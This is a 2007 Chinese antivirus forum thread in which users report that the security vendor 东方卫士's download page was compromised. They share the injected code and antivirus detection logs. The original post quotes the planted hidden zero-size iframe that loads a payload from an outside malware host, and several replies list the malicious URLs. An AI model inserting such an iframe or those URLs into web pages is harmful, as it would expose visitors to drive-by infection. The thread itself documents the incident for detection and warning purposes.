查看: 2869|回复: 13
收起左侧

东方卫士的网站又被挂马!

[复制链接]
zy6720
发表于 2007-4-19 09:05:12 | 显示全部楼层 |阅读模式
东方卫士的网站又被挂马!太垃圾了
挂马网址http://w ww.i110.com/updatedown/index.html

被挂的马如下:
已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.fm        URL: http://s.gcuj.com/1.htm



网页源文件后面被加了
<iframe src="http://s.gcuj.com/bd.htm?143" width="0" height="0" frameborder="0"></iframe>
zy6720
 楼主| 发表于 2007-4-19 09:06:37 | 显示全部楼层
卡巴斯基反病毒6.0
The requested URL ht tp://s.gcuj.com/1.htm is forbidden
kp2006
头像被屏蔽
发表于 2007-4-19 09:26:45 | 显示全部楼层
eset报了几分钟 [:1:]
1p1
发表于 2007-4-19 09:26:51 | 显示全部楼层
木马名称:Trojan-PSW.Win32.OnLineGames.cgf
程序:0.EXE [:1:]
zy6720
 楼主| 发表于 2007-4-19 11:09:11 | 显示全部楼层
楼上的兄弟,我们俩的报的木马名称怎么不一样啊
The EQs
发表于 2007-4-19 11:10:36 | 显示全部楼层
Time        Module        Object        Name        Threat        Action        User        Information
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:39        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/t.js        a variant of Win32/TrojanDownloader.Ani.Gen trojan                KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/t.js        a variant of Win32/TrojanDownloader.Ani.Gen trojan                KASPERSK-56C566\EQ2
zhaonimm
发表于 2007-4-19 11:11:07 | 显示全部楼层
费尔昨天抱了11个啊........
zy6720
 楼主| 发表于 2007-4-19 11:19:31 | 显示全部楼层
Trojan-Downloader.VBS.Psyme.fm

Trojan-PSW.Win32.OnLineGames.cgf

TrojanDownloader.Agent.E trojan
TrojanDownloader.Ani.Gen trojan

为什么大家显示的木马名称都不一样啊,上面的用的是杀毒软件啊
鼻耳盖子
发表于 2007-4-19 12:34:26 | 显示全部楼层

的确太可怕了

我这里下载了2个程序都被报了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
icka
发表于 2007-4-19 12:43:50 | 显示全部楼层
那个JS文件看文件头是ANI文件吧.可后面没加病毒地址哦?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 10:28 , Processed in 0.124411 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表